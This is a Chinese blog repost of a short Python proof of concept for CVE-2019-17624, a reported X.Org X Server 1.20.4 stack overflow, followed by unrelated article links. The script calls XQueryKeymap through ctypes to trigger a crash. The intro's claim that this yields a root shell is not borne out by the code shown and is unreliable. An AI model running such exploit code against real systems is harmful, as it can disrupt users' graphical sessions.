linux xampp 图形界面,Linux图形界面X Server本地栈溢出POC

最新推荐文章于 2022-08-16 11:24:51 发布
最新推荐文章于 2022-08-16 11:24:51 发布
阅读量120 收藏
点赞数
文章标签: linux xampp 图形界面

X Server 是绝大对数Linux发行版和Unix系统的基础图形界面程序,是系统标配。而此程序也是以Root权限启动的,因而成功溢出它而获得的shell,也是root权限。

# 标题: X.Org X Server 1.20.4 本地栈溢出

# 时间: 2019-10-16

# 作者: Marcelo Vázquez (s4vitar)

# 厂商: https://www.x.org/

# 版本: <= 1.20.4

# 测试平台: Linux

# CVE: CVE-2019-17624

XServer

POC

#!/usr/bin/python

#coding: utf-8

# ************************************************************************

# *                Author: Marcelo Vázquez (aka s4vitar)                 *

# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *

# ************************************************************************

import sys, time

import ctypes as ct

from ctypes import cast

from ctypes.util import find_library

def access_violation(x11, current_display):

keyboard = (ct.c_char * 1000)()

x11.XQueryKeymap(current_display, keyboard)

if __name__ == ‘__main__’:

print “\n[*] Loading x11…\n”

time.sleep(2)

x11 = ct.cdll.LoadLibrary(find_library(“X11″))

current_display = x11.XOpenDisplay(None)

print “[*] Exploiting…\n”

time.sleep(1)

try:

access_violation(x11, current_display)

except:

print “\nError…\n”

sys.exit(1)

weixin_39638188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xampp-linux-x64-7.3.9.zip
09-25
描述中提到的"xampp-linux-x64-7.3.9-0-installer.run"是一个Linux 64位系统的安装程序,通常为shell脚本格式,用户可以通过运行这个脚本来在CentOS 7系统上安装XAMPP。"官方的下载速度太慢了"可能意味着在官方源...
xampp-linux-x64-7.3.10-1-installer.run
10-28
2019年10月最新版本 PHP Version 7.3.10 Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.3.10 mod_perl/2.0.8-dev Perl/v5.16.3 mysqlnd 5.0.12-dev - 20150407 - $Id: 7cc7cc96e675f6d72e5cf0f267f48e167c2abb23 $
xampp mysql 内存溢出_linux中tomcat内存溢出解决办法
weixin_35712036的博客
02-09 129
用命令 tail -f /root/apache-tomcat-6.0.20/logs/catalina.out(需要找到tomcat路径) 查看日志,查看是否有错误linux中tomcat内存溢出解决办法常见的一般会有下面三种情况:1.OutOfMemoryError: Java heap space2.OutOfMemoryError: PermGen space3.OutOfMemoryEr...
xampp mysql 内存溢出_php - SQLSTATE [HY000] [2002]连接被拒绝 - 堆栈内存溢出
weixin_30834169的博客
02-22 258
我通过将主机更改为localhost尝试了其他解决方案,但仍然没有帮助。我正在尝试使用php artisan migrate连接MySQL,但出现以下异常:: SQLSTATE[HY000] [2002] Connection refused (SQL: select * from information_schema.tables where table_schema = sample_db a...
xampp mysql 内存溢出_xampp开启php-debug
weixin_35275189的博客
02-09 106
[XDebug]zend_extension = "C:\xampp\php\ext\php_xdebug.dll";xdebug.profiler_append = 0;xdebug.profiler_enable = 1;xdebug.profiler_enable_trigger = 0;xdebug.profiler_output_dir = "C:\xampp\tmp";xdebug.p...
XQuery
反手一个bug的博客
12-18 982
选取节点 doc(&amp;amp;quot;books.xml&amp;amp;quot;)/bookstore/book[price&amp;amp;amp;lt;30]/title 看一个例子就懂了,选取books.xml中price节点值小于30的book节点下的title节点内容 FLOWER表达式 for $x in doc(&amp;amp;quot;books.xml&amp;amp;quot;)/bookstore/book where
X Window 编程的两个小问题
linuxheik的专栏
05-20 625
X Window 编程的两个小问题 X Window 其实比 Widnows 要好理解的多,设计的也更为合理一些。但是无奈,资料太少、中文的就更少了。搜来搜去就那么几篇,书也没看见几本 :( 所以在 X 下做开发,对于我,比在 Windows 下麻烦了许多。 最近一段时间遇到了许多问题,解决了两个,记录在这里: 截获窗口关闭的消息 Windows 下很简单,WM_CLOSE 消息是
xampp-linux-x64-5.6.38-0
12-05
标题“xampp-linux-x64-5.6.38-0”指的是XAMPPLinux 64位版本,具体是5.6.38这个发行版。XAMPP(交叉平台的Apache、MySQL、PHP和Perl/Python/PHP)是一个流行的开源软件套件,用于在本地计算机上搭建Web开发环境。...
xampp-linux-x64-8.0.2-0-installer.run
02-25
XAMPP(X-系统,A-Apache,M-Mysql,P-php,P-Phpmyadmin/Perl)这个缩写名称说明了XAMPP安装包所包含 的文件:Apache web 服务器, MySQL数据库, PHP, Perl, FTP 服务程序(FileZillaFTP)和phpMyAdmin。简单的说,XAMPP...
xampp-linux-x64-7.4.11-0-installer.run
10-22
XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包。官网下载速度太慢了,放这上面方便各位取用
深度linux进不了系统软件,不能进入系统,怎么做
weixin_39724009的博客
05-03 505
Created directory fglrx-install.fRYXOiVerifying archive integrity... All good.Uncompressing AMD Proprietary Driver-15.302..................................................................................
linux键盘是哪个文件,【技术分享】一款Linux下的键盘记录软件分析
weixin_28678517的博客
04-28 354
预估稿费:160RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言当前,Linux恶意软件正在逐渐流行起来了。近几年,已经有好几起重大安全事件中所涉及的Linux后门都是从Windows系统移植过来的。在研究Odinaff报告中的Windows KLRD键盘记录软件的过程中,我们发现了几个新的键盘记录软件。在本文中,我们讨论的焦点是MiKey,这是...
Linux系统X服务漏洞,X.Org X Server本地拒绝服务漏洞(CVE-2013-6424)
weixin_32279911的博客
05-09 322
发布日期:2013-12-06更新日期:2013-12-09受影响系统:X.org X.org描述:--------------------------------------------------------------------------------BUGTRAQ ID: 64127CVE(CAN) ID: CVE-2013-6424X.Org Server是X Window Syst...
xorg-xserver相关完全解析
热门推荐
seaship的博客
01-10 1万+
本文主要是从以下几个方面介绍xorg-xserver 相关的知识 1.linux系统图形界面框架 2.xserver 和x client启动过程 3.图形2d,3d加速原理简介 4.xserver主分支代码解析。 5.xserver,xclient协议简介 6.一个基于Xlib的简单例子解析 7.radeon驱动初始化代码解析. 1.linux图形界面框架 参考至:http://dzdl.ipch...
5、使用XQuery
路在何方
10-08 5704
这一节开始将介绍专用于XML数据的标准查询XQuery。XQuery是W< xmlnamespace prefix ="st1" ns ="urn:schemas-microsoft-com:office:smarttags" />3C组织为操作XML数据内容而专门指定的一套
XQuery 注入的介绍与代码防御
煜铭2011
10-07 1639
0x01 介绍 XQuery是XPath的超集,如果Xpath只是一个查询语言,XQuery是一个程序语言,可以声明自定义的功能、变量等等。类似XPath注入,XQuery注入在没有验证用户输入的情况下也会发生。一个程序使用用户名查询博客实体,后端使用XQuery查询XML数据。 1查询实例 用户输入admin,在后台执行的查询为: for$blogpost...
物联网安全实战从零开始-CVE-2019-1762
最新发布
ZetaByte的博客
08-16 407
本环境是蛇矛实验室基于"火天网演攻防演训靶场"进行搭建,通过火天网演中的环境构建模块,可以灵活的对目标网络进行设计和配置,并且可以快速进行场景搭建和复现验证工作。
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6285
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
Linux虚拟机中xampp启动端口冲突问题解析
尽管Linux的人机交互界面可能不如Windows直观,但随着图形化桌面环境的发展,这一差距正在逐渐缩小。 在安全性方面,Linux和Windows各有优势,但Linux由于其开源性质,安全漏洞通常能更快被发现和修复。在功能上,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值